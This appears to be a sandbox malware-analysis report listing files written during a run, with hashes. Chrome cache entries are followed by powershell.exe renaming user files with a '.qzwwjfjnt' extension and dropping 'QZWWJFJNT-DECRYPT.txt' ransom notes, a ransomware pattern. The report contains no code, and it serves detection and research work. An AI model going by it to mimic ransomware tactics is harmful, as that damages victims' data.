MD5: dfa6ed37cd84f695a965f6e6ca42b9ba
SHA256: 87e1a415074f84263aa202f69aef005d608892e82b76877c17ba100ea0bd6c30
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index~RF5fbe50.TMP
binary
MD5: dfa6ed37cd84f695a965f6e6ca42b9ba
SHA256: 87e1a415074f84263aa202f69aef005d608892e82b76877c17ba100ea0bd6c30
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\LOG
text
MD5: 05f224ee2a9950d8b491322f57b31dd2
SHA256: 90d8308c861b4efaa7148683d91cf9c87b1c625e9bfbc936b628cb7fe5732d37
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\000003.log
binary
MD5: 991641dbcc63a7eacba784846f16492f
SHA256: d402a1e89776f26565012ebd063638b57e09e58efc77105415906eebafc0fdd0
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\0ea131f43745e7e8_1
binary
MD5: 80c3acbbfceb5e5973ccd360210414b8
SHA256: e9bad3737e1f66d4703bca09045723ceb1091a9c0934e75aab73a6f3795e6d6a
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt
binary
MD5: 39e27b40fe3f4db34ab2d2f1cf07953f
SHA256: 197e8b3a0147e6580fa2bb76ef024aa5da8a0e1c73806e7aecccc430bdd36178
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\0ea131f43745e7e8_0
binary
MD5: 68861ac0d4f1e867299beef0105209ee
SHA256: bbcc4b65aae0a5d0db0505512091f38b3059e19e11f74607f989e1cd85f38220
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF5fb41f.TMP
binary
MD5: 39e27b40fe3f4db34ab2d2f1cf07953f
SHA256: 197e8b3a0147e6580fa2bb76ef024aa5da8a0e1c73806e7aecccc430bdd36178
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\fdf2cfeb8ad0eeac_0
binary
MD5: eb21774f55f00b6bcd339284602c5499
SHA256: cacd7386feecabb960cd6b2a71a60dc180ed0a5d8575577495dc656bf726f5ba
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index-dir\the-real-index
binary
MD5: f2d060d1cafa93d32853e345ea6016f7
SHA256: 25cf24408df0a98a6792951384127b8a0004b8c4431ed5f5c7310ad08da2e73d
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt
binary
MD5: d133e0bb106d6e85f4f95e80fd55011b
SHA256: d890ea88a5b14b371c609f3c804fc46c05c6ad1f586e4db58007a78783be22ca
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF5fb306.TMP
binary
MD5: d133e0bb106d6e85f4f95e80fd55011b
SHA256: d890ea88a5b14b371c609f3c804fc46c05c6ad1f586e4db58007a78783be22ca
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index
text
MD5: 4f67aba5cb5b04976834ad6da18d2017
SHA256: 4476d281b3d119577eb8f19fd90e042e5a456cba30d0bb16d05654acc91aec5b
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\ba23d8ecda68de77_1
binary
MD5: a504c5f1bf56897a0e970a63c6b717a1
SHA256: 0f9015ffa192ee707c34a090243c589b89353b60184d9a966b3a258367983547
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\ba23d8ecda68de77_0
binary
MD5: f9a46b9c7fef80d7715ea8cb5af5b8fa
SHA256: c9115ee43e2a1ca13dd017dd4fbc6f094bec13ce7a3b0fa8225f91086319ff38
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010
compressed
MD5: 53eea982d7ad1ad35b35fc3edd48e8a7
SHA256: 949ad5b24488206810f318d1a973ef081b6296b8ec0b89e86102dd18b9b7f092
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f
compressed
MD5: 4ecb446ff8a21ef6d3289e73974117f6
SHA256: 36b6de616ac491341256588a706bd77ffeda7240b9cca5d393b040520c4a5f55
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e
image
MD5: 00f2d72689fb026932085025369d0349
SHA256: 9b788d7954eb7e2da54de87ba6ea05ecdb87bf11d422d2b2051564d0173f7385
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Last Session
binary
MD5: 02536c23edc1e418a6fea313d20b2a39
SHA256: 8e8de8689482b477d0beebe0a4ac24b9cabcbfa84848f66b4c0f55cd96dc0fe9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d
binary
MD5: c78d563770cbb657434d4c7842941dd4
SHA256: 995925c898a83f07520a362cc973eeef63fbe3ad78949398a0606701932c04ea
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old
text
MD5: 80b8c44b60f8bd20d1cf8277ec794bb1
SHA256: 6371157cf7270dd227625ddf799da6c38c60b3e2110fe540b8bc9df48aef09a6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old~RF5faae7.TMP
text
MD5: 80b8c44b60f8bd20d1cf8277ec794bb1
SHA256: 6371157cf7270dd227625ddf799da6c38c60b3e2110fe540b8bc9df48aef09a6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\50521ac2a7de6658_0
binary
MD5: a6dc24d1c300f3d6f265bff1a584711d
SHA256: 807e8928688d338dd04f6d534cb702578b4b112bb08e051234dc0a172f6b3452
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\40bba07c05914591_0
binary
MD5: 6a1bd69a374184a71c0d5f3aad192ea3
SHA256: dd9d226c253720cab761849be68b776e9819a118b84392ce2dacd18b4ce002f9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.google.de_0.indexeddb.leveldb\LOG.old
text
MD5: 65e3a899ee20811d157b572ffa34a607
SHA256: fdbc070214092df54b10dc06b2a40f0cc30ad00d410ba67de9f98a3d53f08a75
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old
text
MD5: 7282c871a31b4aae7e61cdbb39a13331
SHA256: af615c556e2a22e87135a967c01e869216f65268a88bd218fd6ab70467bdf733
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old~RF5fa9af.TMP
text
MD5: 7282c871a31b4aae7e61cdbb39a13331
SHA256: af615c556e2a22e87135a967c01e869216f65268a88bd218fd6ab70467bdf733
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\0ea131f43745e7e8_0
binary
MD5: 8eb321616bf1b12c175d54f703f49cb9
SHA256: 4729f8172895019445e58b9b87ce33dff33833f958e08907ed0a5d377150c02f
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c
compressed
MD5: 050c5009c7b47926ed108d655f11fefd
SHA256: 5d5fbdebd5905e344a185085fa89be0c08778eaa5d1f2c1d1475c0a08f6b9fd7
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\1157fee2e2dc1968_0
binary
MD5: a7718eb33187093504bfbb792b8979bc
SHA256: ca4d42f87d4710590f66f07c7926e86230b52bc9b86b4d8db43ee7166e62e19d
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\50da1ec5d44a313d_0
binary
MD5: e90d3af9f1bd9564045c75d1af06b2cf
SHA256: 74f422511b067f9a54d5d135373114e0498bcfb78bd6dd35b18d36cfc819c018
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\27234a8c67dc4f16_0
binary
MD5: dbeac838b15a68392f3b84620893500c
SHA256: 07bc98f7a8da1e25dc6cca59b7f191c17c5e2fc2bb7e99bb5a83ce888c923fc5
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old
text
MD5: ea6d75c35eb812fdc5762d84963de026
SHA256: a4e911f2978a45872ede6742468623884a33bca6e015dfb35dd4d55034d9ab74
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old~RF5fa74e.TMP
text
MD5: ea6d75c35eb812fdc5762d84963de026
SHA256: a4e911f2978a45872ede6742468623884a33bca6e015dfb35dd4d55034d9ab74
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
text
MD5: 84042895723ac99f9599edfc7500051c
SHA256: ac49bbf4b490c77bddf11de45ef4965c72b16b00cb2519fdb627363f760c6219
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old~RF5fa6d1.TMP
text
MD5: 84042895723ac99f9599edfc7500051c
SHA256: ac49bbf4b490c77bddf11de45ef4965c72b16b00cb2519fdb627363f760c6219
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index~RF5fa682.TMP
binary
MD5: 7310bf883e828ae9b8e6bd793d45e139
SHA256: 6a17c6592725f64037ee1e3ce5a71ebc0535c92c7ca7ecdca4f055dee0ca6fac
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index
binary
MD5: 7310bf883e828ae9b8e6bd793d45e139
SHA256: 6a17c6592725f64037ee1e3ce5a71ebc0535c92c7ca7ecdca4f055dee0ca6fac
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
binary
MD5: 398515593e84cf47a712eadd09e9f44b
SHA256: d5b3486a89f34a0b0ffbeacd074423da9db1dec574638b2901b2519102b4b1b9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model
binary
MD5: 26637c4ed571bd23a2d91ee072350450
SHA256: a029fb110131da9d994d7fac081d82cfe7a9874c92a8c2a2f336ada18b809077
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Translate Ranker Model~RF5fa634.TMP
binary
MD5: 26637c4ed571bd23a2d91ee072350450
SHA256: a029fb110131da9d994d7fac081d82cfe7a9874c92a8c2a2f336ada18b809077
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\901bd201-968c-4408-99fb-cec0e618ac01.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RF5fa2d9.TMP
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT~RF5fa2d9.TMP
text
MD5: edd71dd3bade6cd69ff623e1ccf7012d
SHA256: befea596b4676ccf7cc37ea8048044bfa0556c8931d76fdeeb693d20264e50d6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old~RF5fa2d9.TMP
text
MD5: f727dd25cda7b2cc574098cee1f5764a
SHA256: 5f7bd6926940e400ee7faa6d620192ca299f7b5aaa92d672f8173a767b3fbbff
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
text
MD5: f727dd25cda7b2cc574098cee1f5764a
SHA256: 5f7bd6926940e400ee7faa6d620192ca299f7b5aaa92d672f8173a767b3fbbff
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
text
MD5: 197882774a7ecec9046bc48f63189b66
SHA256: 27377b0d5f989997c2c3f74acf163eed44b60631ddaa768f6655d7be555742b2
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
text
MD5: 1aa66efdb743fb0a8dcc1cd79b0b6542
SHA256: 28d56532cced7375a2a1c7731e57c1a1c2ec1ac9827f3e5beee7f8069a5f87dd
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF5fa2aa.TMP
text
MD5: 1aa66efdb743fb0a8dcc1cd79b0b6542
SHA256: 28d56532cced7375a2a1c7731e57c1a1c2ec1ac9827f3e5beee7f8069a5f87dd
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF5fa2aa.TMP
text
MD5: 197882774a7ecec9046bc48f63189b66
SHA256: 27377b0d5f989997c2c3f74acf163eed44b60631ddaa768f6655d7be555742b2
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\0bda02e5-38b2-4599-861c-6f802d892780.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
text
MD5: 8ca4ba2b95d7089861a48ed69fde6561
SHA256: aa64c14d0c68b62bbab62a6d6fa4662ff89e1fbc7b337c926ac213c191d6406c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old~RF5fa27b.TMP
text
MD5: 8ca4ba2b95d7089861a48ed69fde6561
SHA256: aa64c14d0c68b62bbab62a6d6fa4662ff89e1fbc7b337c926ac213c191d6406c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF5fa28b.TMP
text
MD5: 92be6b127e72365885ad4c3fb6534ee2
SHA256: 54302a2573acc775720e7db0ad85873276713302b4f72596a8dcc44b01c70e51
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old
text
MD5: 92be6b127e72365885ad4c3fb6534ee2
SHA256: 54302a2573acc775720e7db0ad85873276713302b4f72596a8dcc44b01c70e51
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Version
text
MD5: c10ebd4db49249efc8d112b2920d5f73
SHA256: 90a1b994cafe902f22a88a22c0b6cc9cb5b974bf20f8964406dd7d6c9b8867d1
1864
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
binary
MD5: b59113c2dcd2d346f31a64f231162ada
SHA256: 1d97c69aea85d3b06787458ea47576b192ce5c5db9940e5eaa514ff977ce2dc2
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
binary
MD5: 9c016064a1f864c8140915d77cf3389a
SHA256: 0e7265d4a8c16223538edd8cd620b8820611c74538e420a88e333be7f62ac787
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 747195314e5da00a51494ab68ee3c761
SHA256: 5c7cff99c145c5162abe5017064a881912e88c8a77b230ae0332b9e308689cc1
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 4fd37fc3048593304bd2df7af0498101
SHA256: 81a153056d17d93989a43a0c34332370e132b771636c0ad9fcd352fa958066cc
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\pidor.bmp
image
MD5: aee8e730b362ee5d1937a4695c072792
SHA256: 413a81095073b9b5b0ada9afef876449fdfd71f45b2d20bc9595b1723fcd3e77
256
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.qzwwjfjnt
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Videos\Sample Videos\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.qzwwjfjnt
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Recorded TV\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.qzwwjfjnt
binary
MD5: c2e21b3080338743c0e8c96565d4f1c0
SHA256: 6fd145894c2873f741043152ad541ab3a0042204d1d434cefa364d5496485234
256
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.qzwwjfjnt
binary
MD5: 60ab83464e22e9cbc76f1aefc7ebb8e1
SHA256: 5a8d405b6618036e114d9c9ecc3603f01b050ee9371faafbf162c4fcf8a1ff7d
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.qzwwjfjnt
binary
MD5: c9f6128f1eb6f3a0f73694fdad799e81
SHA256: 7d3e7ce8b204d6a05d37ddff8f8b50d9f59b1802f928100fa5912de69ddd9e7a
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.qzwwjfjnt
binary
MD5: 048bdf1965dbce8c3fb7fdd392072f2c
SHA256: 877e4121899996035ba33a0377c689f4e5496c8b2cc1c136451607705e4be3d6
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.qzwwjfjnt
binary
MD5: 6ee7b706290bc5fd4be149c3cb2fa307
SHA256: f8c59c994c980ee5391607707287c691f324b8f9e087d49a7416cedfa4876f97
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.qzwwjfjnt
binary
MD5: 55171357195395531cf30f7fdfef62bc
SHA256: d3befde8d5a14a8c00803b3200dbc029e5825354d606ef52f72ab4febb1c2f7b
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.qzwwjfjnt
binary
MD5: 34a19336446712bbae14b3d1722ec457
SHA256: 9d2a057f4e2cea57b18b4d9a9f7de9120ebf3e927d6e1cc16515bda18efb2b40
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.qzwwjfjnt
binary
MD5: 39b7e1ec274cdc5927e44c7f4cc5f3c8
SHA256: 068d988e8f6fa2e96e48798fbc39badb8897200614f7eaa2ef32df02d6829d36
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.qzwwjfjnt
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.qzwwjfjnt
binary
MD5: 2f8676741f32745b569c04b994355d6e
SHA256: 89079acf1c1760157bb5504bcbeb0710543c2ddf14886cdd3f9bc35e893a5169
256
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.qzwwjfjnt
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.qzwwjfjnt
binary
MD5: 75ef45e5dd93b6c78cfc80870f79226d
SHA256: ee23952ffc0d910492759afd7bfe6242efedc3b94a6934ecb3c64c698e140a44
256
powershell.exe
C:\Users\Public\Music\Sample Music\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\Public\Downloads\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Favorites\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Libraries\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Videos\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Pictures\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Music\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\Public\Documents\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Searches\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.qzwwjfjnt
binary
MD5: 5f7f7b9666d1f24b5005ce183c202f88
SHA256: 6ec5c9cba13db57b5ac55b5929ed31e4e099b6d442209157a88d6f7fdb6bc944
256
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.qzwwjfjnt
binary
MD5: 85a5092d6fc0d51644dc3f2386f9f18d
SHA256: 3562cf286851bf81dc1f59694866b0d57f3257d528d1e668a6f6926b3e0df08f
256
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Saved Games\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Pictures\qrecently.jpg.qzwwjfjnt
binary
MD5: 8b263bd66fc99ab2b2bd67027e8662d3
